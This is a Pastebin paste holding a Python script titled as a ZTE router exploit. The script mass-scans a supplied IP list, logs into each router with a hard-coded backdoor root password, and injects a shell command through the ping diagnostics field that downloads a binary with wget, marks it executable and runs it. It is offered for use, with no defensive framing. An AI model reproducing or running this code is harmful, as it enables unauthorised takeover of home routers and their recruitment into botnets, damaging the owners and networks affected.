SHARE
TWEET

zte router exploit

maki_ Nov 6th, 2018 71 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #! python !#
  2. import threading, sys, time, random, socket, subprocess, re, os, base64, struct, array, requests
  3. from threading import Thread
  4. from time import sleep
  5. import requests
  6. from requests.auth import HTTPDigestAuth
  7. from decimal import *  
  8. ips = open(sys.argv[1], "r").readlines()
  9.  
  10. # small 0day on zte routers deployed in greece
  11.  
  12. login_payload = "Frm_Logintoken=4&Username=root&Password=W%21n0%26oO7."
  13. command_payload = "&Host=;$(cd /tmp;wget http://google.com/mips; chmod 777 mips; ./mips zte)&NumofRepeat=1&DataBlockSize=64&DiagnosticsState=Requested&IF_ACTION=new&IF_IDLE=submit"
  14.  
  15. def run(cmd):
  16.     subprocess.call(cmd, shell=True)
  17.  
  18. class rtek(threading.Thread):
  19.         def __init__ (self, ip):
  20.             threading.Thread.__init__(self)
  21.             self.ip = str(ip).rstrip('\n')
  22.         def run(self):
  23.             try:
  24.                 print "[ZTE] Loading - " + self.ip
  25.                 url = "http://" + self.ip + ":8083/login.gch"
  26.                                 url2 = "http://" + self.ip + ":8083/manager_dev_ping_t.gch"
  27.                 url3 = "http://" + self.ip + ":8083/getpage.gch?pid=1001&logout=1"
  28.                                
  29.                 requests.post(url, timeout=3, data=login_payload) # bypass auth with backdoor
  30.                 requests.post(url2, timeout=2.5, data=command_payload) # command injection in ping function
  31.                                 requests.get(url3, timeout=2.5) # logout so we dont keep the session open (it happens and its annoying)
  32.  
  33.             except Exception as e:
  34.                 pass
  35. for ip in ips:
  36.     try:
  37.         n = rtek(ip)
  38.         n.start()
  39.         time.sleep(0.03)
  40.     except:
  41.         pass
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top